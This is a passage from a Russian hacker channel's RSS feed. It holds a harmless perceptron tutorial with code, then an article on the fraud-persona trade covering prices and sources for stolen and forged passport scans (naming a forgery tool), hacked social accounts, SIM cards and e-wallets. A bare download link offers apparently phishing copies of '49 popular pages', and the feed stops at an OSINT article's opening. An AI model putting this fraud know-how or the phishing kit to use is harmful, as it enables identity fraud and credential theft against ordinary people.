  <figure class="m_column">
    <img src="https://sun1-28.userapi.com/c851424/v851424801/d47c6/FKK4af1CFfw.jpg" width="807" />
  </figure>
  <p>Основное отличие в том, что сейчас вес равен <strong>нулю</strong>, поэтому моргающего кролика мы не получили, ну, пока, по крайней мере. Теперь научим кролика моргать по команде, смешивая раздражители (звуковой сигнал и дуновение):</p>
  <figure class="m_column">
    <img src="https://sun1-25.userapi.com/c851424/v851424801/d47d9/aQVBj8wkiSc.jpg" width="807" />
  </figure>
  <p>Важно, что эти события происходят в разные временные <strong>эпохи</strong>, в графах это будет выглядеть так:</p>
  <figure class="m_column">
    <img src="https://sun1-29.userapi.com/c851424/v851424801/d47da/U8b3lz17hK0.jpg" width="807" />
  </figure>
  <p>Сам по себе звук ничего не делает, но воздушный поток по-прежнему заставляет кролика моргать, и мы показываем это через веса, умноженные на раздражители (красным).</p>
  <p><strong>Обучение </strong>сложному поведению можно упрощённо выразить как постепенное изменение веса между связанными нейронами с течением времени.</p>
  <p>Чтобы обучить кролика, повторим действия:</p>
  <figure class="m_column">
    <img src="https://sun1-83.userapi.com/c851424/v851424801/d47e6/zVmthhddNVU.jpg" width="807" />
  </figure>
  <p>Для первых трёх попыток схемы будут выглядеть так:</p>
  <figure class="m_column">
    <img src="https://sun1-14.userapi.com/c851424/v851424801/d47ee/ZJlOcRzOIIc.jpg" width="807" />
  </figure>
  <p>Обратите внимание, что вес для звукового раздражителя растет после каждого повтора (выделено красным), это значение сейчас произвольное — мы выбрали 0.30, но число может быть каким угодно, даже отрицательным. После третьего повтора вы не заметите изменения в поведении кролика, но после четвертого повтора произойдет нечто удивительное — поведение изменится.</p>
  <figure class="m_column">
    <img src="https://sun1-90.userapi.com/c851424/v851424801/d47f6/2FviDHtukN0.jpg" width="807" />
  </figure>
  <p>Мы убрали воздействие воздухом, но кролик все еще моргает, услышав звуковой сигнал! Объяснить это поведение может наша последняя схемка:</p>
  <figure class="m_column">
    <img src="https://sun1-83.userapi.com/c851424/v851424801/d47fe/CCXPSeCH78U.jpg" width="807" />
  </figure>
  <p>Мы обучили кролика реагировать на звук морганием.</p>
  <figure class="m_column">
    <img src="https://sun1-96.userapi.com/c851424/v851424801/d4806/Sxh1VtnM-nI.jpg" width="807" />
  </figure>
  <p><em>В условиях реального эксперимента такого рода может потребоваться более 60 повторений для достижения результата.</em></p>
  <p>Теперь мы оставим биологический мир мозга и кроликов и попробуем адаптировать всё, что узнали, для создания искусственной нейросети. Для начала попробуем сделать простую задачу.</p>
  <p>Допустим, у нас есть машина с четырьмя кнопками, которая выдает еду при нажатии правильной кнопки (ну, или энергию, если вы робот). Задача — узнать, какая кнопка выдает вознаграждение:</p>
  <figure class="m_column">
    <img src="https://sun1-98.userapi.com/c851424/v851424801/d480e/i7D8qQ8HsoI.jpg" width="807" />
  </figure>
  <p>Мы можем изобразить (схематично), что делает кнопка при нажатии следующим образом:</p>
  <figure class="m_column">
    <img src="https://sun1-92.userapi.com/c851424/v851424801/d4816/q7I0SQV-qPs.jpg" width="807" />
  </figure>
  <p>Такую задачу лучше решать целиком, поэтому давайте посмотрим на все возможные результаты, включая правильный:</p>
  <figure class="m_column">
    <img src="https://sun1-84.userapi.com/c851424/v851424801/d481e/DWZZy0vv7Ac.jpg" width="807" />
  </figure>
  <p><em>Нажмите на 3-ю кнопку, чтобы получить свой ужин.</em></p>
  <p>Чтобы воспроизвести нейронную сеть в коде, нам для начала нужно сделать модель или график, с которым можно сопоставить сеть. Вот один подходящий под задачу график, к тому же он хорошо отображает свой биологический аналог:</p>
  <figure class="m_column">
    <img src="https://sun1-84.userapi.com/c851424/v851424801/d4826/PJeNSqoS8Mo.jpg" width="807" />
  </figure>
  <p>Эта нейронная сеть просто получает входящую информацию — в данном случае это будет восприятие того, какую кнопку нажали. Далее сеть заменяет входящую информацию на веса и делает вывод на основе добавления слоя. Звучит немного запутанно, но давайте посмотрим, как в нашей модели представлена кнопка:</p>
  <figure class="m_column">
    <img src="https://sun1-23.userapi.com/c851424/v851424801/d482e/oLpgVVMAbxk.jpg" width="807" />
  </figure>
  <p><em>Обратите внимание, что все веса равны 0, поэтому нейронная сеть, как младенец, совершенно пуста, но полностью взаимосвязана.</em></p>
  <p>Таким образом мы сопоставляем внешнее событие с входным слоем нейронной сети и вычисляем значение на ее выходе. Оно может совпадать или не совпадать с реальностью, но это мы пока проигнорируем и начнем описывать задачу понятным компьютеру способом. Начнем с ввода весов (будем использовать JavaScript):</p>
  <pre>var inputs = [0,1,0,0];
var weights = [0,0,0,0];

// Для удобства эти векторы можно назвать</pre>
  <p>Следующий шаг — создание функции, которая собирает входные значения и веса и рассчитывает значение на выходе:</p>
  <pre>function evaluateNeuralNetwork(inputVector, weightVector){   
 var result = 0; 
 inputVector.forEach(function(inputValue, weightIndex) {
  layerValue = inputValue*weightVector[weightIndex];
   result += layerValue;
 });  
 return (result.toFixed(2)); 
}

// Может казаться комплексной, но все, что она делает — это сопоставляет пары вес/ввод и добавляет результат</pre>
  <p>Как и ожидалось, если мы запустим этот код, то получим такой же результат, как в нашей модели или графике…</p>
  <pre>evaluateNeuralNetwork(inputs, weights); // 0.00</pre>
  <p>Живой пример: <a href="http://codepen.io/k3no/pen/GWyJgP" target="_blank">Neural Net 001</a>.</p>
  <p>Следующим шагом в усовершенствовании нашей нейросети будет способ проверки её собственных выходных или результирующих значений сопоставимо реальной ситуации, давайте сначала закодируем эту конкретную реальность в переменную:</p>
  <figure class="m_column">
    <img src="https://sun1-14.userapi.com/c851424/v851424801/d4836/SnuV5KmQRbg.jpg" width="807" />
  </figure>
  <p>Чтобы обнаружить несоответствия (и сколько их), мы добавим функцию ошибки:</p>
  <pre>Error = Reality - Neural Net Output</pre>
  <p>С ней мы можем оценивать работу нашей нейронной сети:</p>
  <figure class="m_column">
    <img src="https://sun1-29.userapi.com/c851424/v851424801/d483e/kPYx4N8ngHo.jpg" width="807" />
  </figure>
  <p>Но что более важно — как насчет ситуаций, когда реальность даёт положительный результат?</p>
  <figure class="m_column">
    <img src="https://sun1-98.userapi.com/c851424/v851424801/d4846/Vq_fE0QFLp0.jpg" width="807" />
  </figure>
  <p>Теперь мы знаем, что наша модель нейронной сети не работает (и знаем, насколько), здорово! А здорово это потому, что теперь мы можем использовать функцию ошибки для управления нашим обучением. Но всё это обретет смысл в том случае, если мы переопределим функцию ошибок следующим образом:</p>
  <pre>Error = &lt;b&gt;Desired Output&lt;/b&gt; - Neural Net Output</pre>
  <p>Неуловимое, но такое важное расхождение, молчаливо показывающее, что мы будем использовать ранее полученные результаты для сопоставления с будущими действиями (и для обучения, как мы потом увидим). Это существует и в реальной жизни, полной повторяющихся паттернов, поэтому оно может стать эволюционной стратегией (ну, в большинстве случаев).</p>
  <p>Далее в наш пример кода мы добавим новую переменную:</p>
  <pre>var input = [0,0,1,0];
var weights = [0,0,0,0];
var desiredResult = 1;</pre>
  <p>И новую функцию:</p>
  <pre>function evaluateNeuralNetError(desired,actual) {
 return (desired — actual);
}
// After evaluating both the Network and the Error we would get:
// &quot;Neural Net output: 0.00 Error: 1&quot;</pre>
  <p>Живой пример: <a href="http://codepen.io/k3no/pen/dvaGpX" target="_blank">Neural Net 002</a>.</p>
  <p><strong>Подведём промежуточный итог</strong>.</p>
  <p>Мы начали с задачи, сделали её простую модель в виде биологической нейронной сети и получили способ измерения её производительности по сравнению с реальностью или желаемым результатом. Теперь нам нужно найти способ исправления несоответствия — процесс, который как и для компьютеров, так и для людей можно рассматривать как обучение.</p>
  <hr />
  <h3><strong>Как обучать нейронную сеть?</strong></h3>
  <p>Основа обучения как биологической, так и искусственной нейронной сети — это повторение и <strong>алгоритмы обучения</strong>, поэтому мы будем работать с ними по отдельности. Начнем с обучающих алгоритмов.</p>
  <p>В природе под алгоритмами обучения понимаются изменения физических или химических характеристик нейронов после проведения экспериментов:</p>
  <figure class="m_column">
    <img src="https://sun1-86.userapi.com/c851424/v851424801/d484e/9IuZXgrUP6E.jpg" width="807" />
  </figure>
  <p>Драматическая иллюстрация того, как два нейрона меняются по прошествии времени в коде и нашей модели «алгоритм обучения» означает, что мы просто будем что-то менять в течение какого-то времени, чтобы облегчить свою жизнь. Поэтому давайте добавим переменную для обозначения степени облегчения жизни:</p>
  <pre>var learningRate = 0.20;
// Чем больше значение, тем быстрее будет процесс обучения :)</pre>
  <p><strong>И что это изменит?</strong></p>
  <p>Это изменит веса (прям как у кролика!), особенно вес вывода, который мы хотим получить:</p>
  <figure class="m_column">
    <img src="https://sun1-99.userapi.com/c851424/v851424801/d4856/8jEI8MN3wxs.jpg" width="807" />
  </figure>
  <p>Как кодировать такой алгоритм — ваш выбор, я для простоты добавляю коэффициент обучения к весу, вот он в виде функции:</p>
  <pre>function learn(inputVector, weightVector) {
 weightVector.forEach(function(weight, index, weights) {
  if (inputVector[index] &gt; 0) {
   weights[index] = weight + learningRate;
  }
 });
}</pre>
  <p>При использовании эта обучающая функция просто добавит наш коэффициент обучения к вектору веса <strong>активного нейрона</strong>, до и после круга обучения (или повтора) результаты будут такими:</p>
  <pre>// Original weight vector: [0,0,0,0]
// Neural Net output: 0.00 Error: 1
learn(input, weights);
// New Weight vector: [0,0.20,0,0]
// Neural Net output: 0.20 Error: 0.8
// Если это не очевидно, вывод нейронной сети близок к 1 (выдача курицы) — то, чего мы и
хотели, поэтому можно сделать вывод, что мы движемся в правильном направлении</pre>
  <p>Живой пример: <a href="http://codepen.io/k3no/pen/qrJoXO" target="_blank">Neural Net 003</a>.</p>
  <p>Окей, теперь, когда мы движемся в верном направлении, последней деталью этой головоломки будет внедрение <strong>повторов</strong>.</p>
  <p>Это не так уж и сложно, в природе мы просто делаем одно и то же снова и снова, а в коде мы просто указываем количество повторов:</p>
  <pre>var trials = 6;</pre>
  <p>И внедрение в нашу обучающую нейросеть функции количества повторов будет выглядеть так:</p>
  <pre>function train(trials) {
for (i = 0; i &lt; trials; i++) {
 neuralNetResult = evaluateNeuralNetwork(input, weights);
         learn(input, weights);
}
}</pre>
  <p>Ну и наш окончательный отчет:</p>
  <pre>Neural Net output: 0.00 Error: 1.00 Weight Vector: [0,0,0,0]
Neural Net output: 0.20 Error: 0.80 Weight Vector: [0,0,0.2,0]
Neural Net output: 0.40 Error: 0.60 Weight Vector: [0,0,0.4,0]
Neural Net output: 0.60 Error: 0.40 Weight Vector: [0,0,0.6,0]
Neural Net output: 0.80 Error: 0.20 Weight Vector: [0,0,0.8,0]
Neural Net output: 1.00 Error: 0.00 Weight Vector: [0,0,1,0]
// Chicken Dinner !</pre>
  <p>Живой пример: <a href="http://codepen.io/k3no/pen/dvBZLe?editors=0012" target="_blank">Neural Net 004</a>.</p>
  <p>Теперь у нас есть вектор веса, который даст только один результат (курицу на ужин), если входной вектор соответствует реальности (нажатие на третью кнопку).</p>
  <p><strong>Так что же такое классное мы только что сделали?</strong></p>
  <p>В этом конкретном случае наша нейронная сеть (после обучения) может распознавать входные данные и говорить, что приведет к желаемому результату (нам всё равно нужно будет программировать конкретные ситуации):</p>
  <figure class="m_column">
    <img src="https://sun1-24.userapi.com/c851424/v851424801/d485e/uvwbyVF3oGk.jpg" width="807" />
  </figure>
  <p>Кроме того, это масштабируемая модель, игрушка и инструмент для нашего с вами обучения. Мы смогли узнать что-то новое о машинном обучении, нейронных сетях и искусственном интеллекте.</p>
  <p>Предостережение пользователям:</p>
  <ul>
    <li>Механизм хранения изученных весов не предусмотрен, поэтому данная нейронная сеть забудет всё, что знает. При обновлении или повторном запуске кода нужно не менее шести успешных повторов, чтобы сеть полностью обучилась, если вы считаете, что человек или машина будут нажимать на кнопки в случайном порядке… Это займет какое-то время.</li>
    <li>Биологические сети для обучения важным вещам имеют скорость обучения 1, поэтому нужен будет только один успешный повтор.</li>
    <li>Существует алгоритм обучения, который очень напоминает биологические нейроны, у него броское название: <strong>правило widroff-hoff</strong>, или <strong>обучение widroff-hoff.</strong></li>
    <li>Пороги нейронов (1 в нашем примере) и эффекты переобучения (при большом количестве повторов результат будет больше 1) не учитываются, но они очень важны в природе и отвечают за большие и сложные блоки поведенческих реакций. Как и отрицательные веса.</li>
  </ul>
  <hr />
  <h3>Заметки и список литературы для дальнейшего чтения</h3>
  <p>Я пытался избежать математики и строгих терминов, но если вам интересно, то мы построили <a href="https://ru.wikipedia.org/wiki/%D0%9F%D0%B5%D1%80%D1%86%D0%B5%D0%BF%D1%82%D1%80%D0%BE%D0%BD" target="_blank">перцептрон</a>, который определяется как алгоритм контролируемого обучения (<a href="https://ru.wikipedia.org/wiki/%D0%9E%D0%B1%D1%83%D1%87%D0%B5%D0%BD%D0%B8%D0%B5_%D1%81_%D1%83%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D0%B5%D0%BC" target="_blank">обучение с учителем</a>) <a href="https://en.wikipedia.org/wiki/Binary_classification" target="_blank">двойных классификаторов</a> — тяжёлая штука.</p>
  <p>Биологическое строение мозга — тема не простая, отчасти из-за неточности, отчасти из-за его сложности. Лучше начинать с Neuroscience (Purves) и Cognitive Neuroscience (Gazzaniga). Я изменил и адаптировал пример с кроликом из Gateway to Memory (Gluck), которая также является прекрасным проводником в мир графов.</p>
  <p>Еще один шикарный ресурс An Introduction to Neural Networks (Gurney), подойдет для всех ваших нужд, связанных с ИИ.</p>
  <p>А теперь на Python! Спасибо Илье Андшмидту за предоставленную версию на Python:</p>
  <pre>inputs = [0, 1, 0, 0]
weights = [0, 0, 0, 0]
desired_result = 1
learning_rate = 0.2
trials = 6

def evaluate_neural_network(input_array, weight_array):
    result = 0
    for i in range(len(input_array)):
        layer_value = input_array[i] * weight_array[i]
        result += layer_value
    print(&quot;evaluate_neural_network: &quot; + str(result))
    print(&quot;weights: &quot; + str(weights))
    return result
    
def evaluate_error(desired, actual):
    error = desired - actual
    print(&quot;evaluate_error: &quot; + str(error))
    return error
    
def learn(input_array, weight_array):
    print(&quot;learning...&quot;)
    for i in range(len(input_array)):
        if input_array[i] &gt; 0:
            weight_array[i] += learning_rate
            
def train(trials):
    for i in range(trials):
        neural_net_result = evaluate_neural_network(inputs, weights)
        learn(inputs, weights)
        
train(trials)</pre>
  <p>А теперь на GO! За эту версию благодарю Кирана Мэхера.</p>
  <pre>package main

import (
 &quot;fmt&quot;
 &quot;math&quot;
)

func main() {
 fmt.Println(&quot;Creating inputs and weights ...&quot;)

inputs := []float64{0.00, 0.00, 1.00, 0.00}
 weights := []float64{0.00, 0.00, 0.00, 0.00}
 desired := 1.00
 learningRate := 0.20
 trials := 6

train(trials, inputs, weights, desired, learningRate)
}

func train(trials int, inputs []float64, weights []float64, desired float64, learningRate float64) {

for i := 1; i &lt; trials; i++ {
  weights = learn(inputs, weights, learningRate)
  output := evaluate(inputs, weights)
  errorResult := evaluateError(desired, output)

fmt.Print(&quot;Output: &quot;)
  fmt.Print(math.Round(output*100) / 100)
  fmt.Print(&quot;\nError: &quot;)
  fmt.Print(math.Round(errorResult*100) / 100)
  fmt.Print(&quot;\n\n&quot;)
 }

}

func learn(inputVector []float64, weightVector []float64, learningRate float64) []float64 {
 for index, inputValue := range inputVector {
  if inputValue &gt; 0.00 {
   weightVector[index] = weightVector[index] + learningRate
  }
 }

return weightVector
}

func evaluate(inputVector []float64, weightVector []float64) float64 {
 result := 0.00

for index, inputValue := range inputVector {
  layerValue := inputValue * weightVector[index]
  result = result + layerValue
 }

return result
}

func evaluateError(desired float64, actual float64) float64 {
 return desired - actual
}</pre>
  <hr />
  <h3><a href="https://t.me/h4ckers_zone" target="_blank">Канал</a></h3>
  <h3><a href="https://t.me/h4ckers_zone_bot" target="_blank">Вспомогательный бот канала</a></h3>
  <h3><a href="https://t.me/chat_zone" target="_blank">Чатик канала</a></h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/EYc7ONEoN</guid><link>https://teletype.in/@h4ckers_zone/EYc7ONEoN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/EYc7ONEoN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>Создание виртуальной личности</title><pubDate>Mon, 10 Aug 2020 03:31:57 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/af/7e/af7e6722-e4ef-47f3-b850-e4a5a4448782.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/94/0e/940ed103-68aa-49e6-9088-4d6f2cbc9952.jpeg"></img>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/94/0e/940ed103-68aa-49e6-9088-4d6f2cbc9952.jpeg" width="1200" />
  </figure>
  <p data-align="center"><strong>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.</strong></p>
  <hr />
  <p>В интернете полно мошенников, которые для обмана людей используют «виртуальных личностей». Например, мужчин часто разводят с помощью фейковых страниц девушек, убеждая внести предоплату за интим-услуги или выслать денег «на дорогу».</p>
  <p>Бывает сложно догадаться о том, что сетевого собеседника на самом деле не существует. Ведь у него есть несколько заполненных страниц в соцсетях, номер телефона, на который отвечает женский голос и скан паспорта. Он предоставляется по запросу особо особо бдительных жертв.</p>
  <p>Но достать всё это очень просто. Ведь есть целая индустрия по созданию «виртуальных личностей». Она служит нуждам мошенников, коллекторов, частных детективом и лиц прочих романтических профессий.</p>
  <p>В этой статье будет рассказано о том как делается, для чего используется и сколько стоит инвентарь для сетевого обмана: сканы документов, фейковые профили в соцсетях, левые номера и электронные кошельки. Цель написания этого материала — наглядно показать читателям, как легко можно создать/приобрести инструменты для мошенничества.</p>
  <hr />
  <h2>Сканы паспортов</h2>
  <h3>Для чего используются</h3>
  <p>Для регистрации везде, где требуется скан паспорта. Например, в платёжных системах, онлайн-казино, торговых площадках, Forex-биржах. Для покупки доменов и имитации реальной личности при мошеннических сделках.</p>
  <h3><strong>Примерный порядок цен</strong></h3>
  <p>$1 за чёрно-белую копию первой страницы.</p>
  <p>$3 за цветной скан с пропиской.</p>
  <p>$7-$10 за фото с паспортом в руках+сканы других документов.</p>
  <p>Так дёшево потому, что один документ можно продать неограниченное количество раз. К тому же сканы чужих паспортов и фото владельцев с ними в руках очень легко достать.</p>
  <h3>Как попадают в продажу</h3>
  <p>В поиске по слову «паспорт» на vk.com/docs наглядно видно, что множество людей сами выкладывают их в интернет. Регулярный просмотр социальных сетей, файлобменников и новых картинок в поисковой выдаче Google даёт мошенникам неплохой «урожай».</p>
  <p>Также есть различные схемы, когда людей обманом заставляют высылать сканы паспортов. Например, «игриво настроенная девушка», она же девятиклассник Фёдор, пишет мужчине на сайте знакомств: «Приезжай ко мне в гости прямо сейчас, но сначала вышли скан паспорта, чтобы я могла тебе доверять» или «Вы приняты на работу контент-менеджером, оплата 10 тысяч в день, вышлите документы для оформления в штат».</p>
  <p>Разумеется, скан паспорта можно просто нарисовать. Ещё лет 10 назад для этого сделали специальную программу <em>RF SCreater</em>. Если вписать в поддельный документ данные реального человека, то он будет проходить проверки по базам.</p>
  <h3>Законность.</h3>
  <p>Если факт регистрации домена/аккаунта в онлайн-казино на поддельный паспорт раскроется, то сервис заблокирует вас и других пользователей, который использовали такой же скан. Если ваш документ будет применён для мошенничества и будет заведено уголовное дело, то вам, возможно, надо будет в суде доказывать непричастность к преступлению.</p>
  <hr />
  <h2><strong>Профили в социальных сетях</strong></h2>
  <figure class="m_column">
    <img src="https://telegra.ph/file/f4cd4e3a5c8a9eb7f3965.jpg" width="760" />
  </figure>
  <h3>Для чего используются</h3>
  <p>Реклама, рассылка спама, накрутка подписчиков и лайков, имитация реальной личности при мошенничестве.</p>
  <h3><strong>Примерный порядок цен</strong></h3>
  <p>2-20 рублей — автоматически зарегистрированные и заполненные профили, у которых в друзьях такие же топорные фейки.</p>
  <p>50-3000 рублей — аккаунты живых людей, которые не аккуратно обращались со своими паролями или добровольно решили продать аккаунт. Цена, в первую очередь, зависит от количества и качества друзей (пол, возраст, город, процент ботов) и возраста аккаунта. Иногда делает цену выше красивый ID страницы. Например, 4-значный у страниц Вконтакте.</p>
  <p>От 3000 рублей и выше — аккаунты, которые имеют более 10 тысяч друзей/подписчиков, а также аккаунты-администраторы популярных групп и сообществ.</p>
  <h3>Как попадают в продажу</h3>
  <p>Автоматически регистрируются с помощью ботов, похищаются у владельцев с помощью фишинговых ссылок и кейлоггеров, восстанавливаются после блокировки на новую симку (так называемый «ретрив»), вручную создаются и раскручиваются для последующей продажи. Купить можно аккаунты всех популярных соцсетей. Этим бизнесом занимаются люди по всему миру.</p>
  <h3>Законность сделки</h3>
  <p>Правилами cоциальных сетей продажа аккаунтов запрещена. Теоретически, нарушение грозит баном профиля.</p>
  <hr />
  <h2><strong>Симкарты</strong></h2>
  <h3>Для чего используются</h3>
  <p>Для автоматической регистрации в соцсетях и платежных системах, для имитация реальной личности при мошенничестве. Красивые номера и номера с выгодными тарифами используются чаще для обычных человеческих нужд.</p>
  <h3><strong>Примерный порядок цен</strong></h3>
  <p>5-10 рублей за штуку — простые симкарты (часто зарегистрированную на левую компанию). Продаются большими пакетами.</p>
  <p>500-3000 рублей — симкарты с особо выгодными корпоративными тарифами или теми, которые продавались ограниченными партиями.</p>
  <p>5000-300 000 рублей — симкарты с красивыми комбинациями цифр. Так называемые, «серебрянные», «золотые» и «платиновые» номера.</p>
  <h3>Как попадают в продажу</h3>
  <p>Люди на форумах утверждают, что ими торгуют предприимчивые сотрудники салонов сотовой связи. Также симкарты привозят из Украины, где они продаются свободно.</p>
  <h3>Законность</h3>
  <p>Продажа симкарт без паспорта в России запрещена. Продавцам грозит штраф 5000 рублей для физических лиц, а 200 тысяч для юридических.</p>
  <hr />
  <h2><strong>Электронные кошельки</strong></h2>
  <h3>Для чего используются</h3>
  <p>Для обналички и приема платежей от жертв при осуществлении мошеннических схем.</p>
  <h3><strong>Примерный порядок цен</strong></h3>
  <p>10-30 рублей за простой автоматически зарегистрированный QIWI-кошелек.</p>
  <p>1000-3000 рублей за WebMoney-аккаунт с аттестатом «Начальный» или QIWI-кошелек со статусом «Максимальный» или аккаунт Яндекс.Денег со статусом «Идентифицированный».</p>
  <p>$120 (14 000 рублей) за полностью верифицированный американский аккаунт PayPal.</p>
  <h3>Как попадают в продажу</h3>
  <p>Автоматически регистрируются на левые симкарты, а данные пользователя подтверждаются фальшивыми сканами документов.</p>
  <h3>Законность</h3>
  <p>Правилами платежных систем передавать свои кошельки третьим лицам запрещено. За нарушение бан без возврата средств. В зависимости от ситуации, пользователей таких кошельков могут наказать за мошенничество или уклонение от налогов.</p>
  <hr />
  <h2><strong>Виртуалы</strong></h2>
  <p>Большинство людей довольно подозрительны. Они ищут информацию о личностях, с которыми делают какие-либо дела в разных источниках, но проникаются доверием очень легко. Бдительность усыпляет заполненный Instagram, скан паспорта с соответствующим лицом и разговор по телефону с человеком соответствующего пола.</p>
  <p>Если сложить все вышеописанные четыре раздела статьи вместе, то получится «виртуальная личность». Она может быть использована для разных видов мошенничества: выманивания денег «на дорогу» и «в долг» на сайтах знакомств, приём предоплаты за несуществующие товары, вербовка в секты, сбор денег на благотворительность. Схем тысячи и их описание выходит за рамки этой статьи.</p>
  <h3><strong>Примерный порядок цен</strong></h3>
  <p>$15 — $100 в зависимости от естественности и «заполненности» виртуала.</p>
  <p>Только что созданные и наспех заполненные несколько страниц в разных социальных сетях + пара электронных кошельков будет стоить долларов 20.</p>
  <p>Естественно выглядящие аккаунты с долгой историей и сканами документов около $50.</p>
  <p>100 долларов и выше будет стоить несколько очень качественных фейковых страниц в соцсетях+личный сайт+никнейм засвеченный на разных форумах+сканы документов + виртуальный номер телефона.</p>
  <h3>Как попадают в продажу</h3>
  <p>Делаются специально обученным людьми с помощью набора автоматизирующих инструментов.</p>
  <h3>Законность</h3>
  <p>Создание виртуалов противоречит правилам соцсетей и платежных систем. Кроме того, эта деятельность может рассматриваться как соучастие в преступлении.</p>
  <hr />
  <p><em>Из всего этого есть три основных вывода: не выкладывайте сканы документов в открытый доступ и на файобменники, соблюдайте правила создания, хранения и ввода паролей при использовании соцсетей и будьте предельно внимательны при общении с людьми, которых вы не знаете в реале. Особенно, если переводите им деньги.</em></p>
  <hr />
  <h3><a href="https://t.me/h4ckers_zone" target="_blank">Канал</a></h3>
  <h3><a href="https://t.me/h4ckers_zone_bot" target="_blank">Вспомогательный бот канала</a></h3>
  <h3><a href="https://t.me/chat_zone" target="_blank">Чатик канала</a></h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/ENeQM</guid><link>https://teletype.in/@h4ckers_zone/ENeQM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/ENeQM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>49 фейков популярных страниц</title><pubDate>Fri, 07 Aug 2020 17:24:11 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/d0/6b/d06bda39-7614-43b7-bb4c-c1171388742f.jpeg"></media:content><description><![CDATA[<img src="https://teletype.in/files/0d/76/0d768a8b-e4d0-47bc-b6bd-41edd9216a12.jpeg"></img>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/0d/76/0d768a8b-e4d0-47bc-b6bd-41edd9216a12.jpeg" width="1200" />
  </figure>
  <p data-align="center"><strong>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.</strong></p>
  <hr />
  <figure class="m_original">
    <img src="https://teletype.in/files/d2/b6/d2b680db-2b8f-4f89-86e1-ed8636cd7429.png" width="1499" />
  </figure>
  <p>Ссылка на скачивание:<a href="https://yadi.sk/d/cBDUDWsuTuuWog?w=1" target="_blank">https://yadi.sk/d/cBDUDWsuTuuWog?w=1</a></p>
  <hr />
  <h3><a href="https://t.me/h4ckers_zone" target="_blank">Канал</a></h3>
  <h3><a href="https://t.me/h4ckers_zone_bot" target="_blank">Вспомогательный бот канала</a></h3>
  <h3><a href="https://t.me/chat_zone" target="_blank">Чатик канала</a></h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/zPapqPnBM</guid><link>https://teletype.in/@h4ckers_zone/zPapqPnBM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/zPapqPnBM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>CSI Linux. Монстр OSINT разведки.</title><pubDate>Fri, 07 Aug 2020 05:06:29 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/c1/4f/c14f3a3b-f6e2-4b92-b40c-ba6c57535b12.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/31/00/31003333-3dc5-40e7-b389-49cf0a29781a.jpeg"></img>Сегодня мы с вами поговорим о CSI Linux, разработанным настоящими детективами для киберкриминалистического расследования. Это один из лучших дистрибути́вов для OSINT разведки, реверс инженеринга и выявления вторжений, содержащий безумные количества всеможножных профильных утилит, как для работы в клирнете, так и для расследования в даркнет сетях.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/31/00/31003333-3dc5-40e7-b389-49cf0a29781a.jpeg" width="1200" />
  </figure>
  <hr />
  <p data-align="center">Сегодня мы с вами поговорим о <strong>CSI Linux,</strong> разработанным настоящими детективами для киберкриминалистического расследования.<strong> Это один из лучших дистрибути́вов для OSINT разведки, реверс инженеринга и выявления вторжений</strong>, содержащий безумные количества всеможножных профильных утилит, как для работы в клирнете, так и для расследования в даркнет сетях.</p>
  <hr />
  <h2 data-align="center">Предисловие</h2>
  <p>От большого брата теперь не скрыться. Тысячи виртуальных &quot;глаз&quot; следят за вами и создают подробное цифровое досье, которое можно купить, продать или даже украсть. Умные игрушки, видео-няни собирают данные об увлечениях детей и отправляют производителям. Умная цифровая техника собирает данные и предоставляет ваши секреты корпорациям. В любой момент кто-то может перехватить контроль над вашим автомобилем или смартфоном. Вам кажется, что на вас это никак не отразится, но знайте — ваша цифровая тень уже в зоне риска, страховщики изучают ваш образ жизни, чтобы определить условия страхования, медучереждения вычисляют приблизительный год, когда вы умрёте, чтобы понять стоит ли вас лечить, изучая ваши действия в сети специалисты внушают вам чему верить и за кого голосовать. Ценность вашей жизни измеряется в байтах. Таков новый порядок, выйти из системы невозможно, но есть те, кто готов защищать свободу до последнего: активисты, разоблачители, хакеры. <br />Всё это — серьёзная проблема для новой элиты. <br />Кто все эти люди: угроза или последний шанс простых людей отстоять свободу?</p>
  <hr />
  <h2 data-align="center">CSI Linux | Структура</h2>
  <p><strong><em>Итак, возвращаясь к теме моей статьи.</em></strong></p>
  <ul>
    <li><strong>CSI Linux представляет из себя слияние целых 3 операционных систем, которые распространяются в виде образа виртуальных машин.</strong></li>
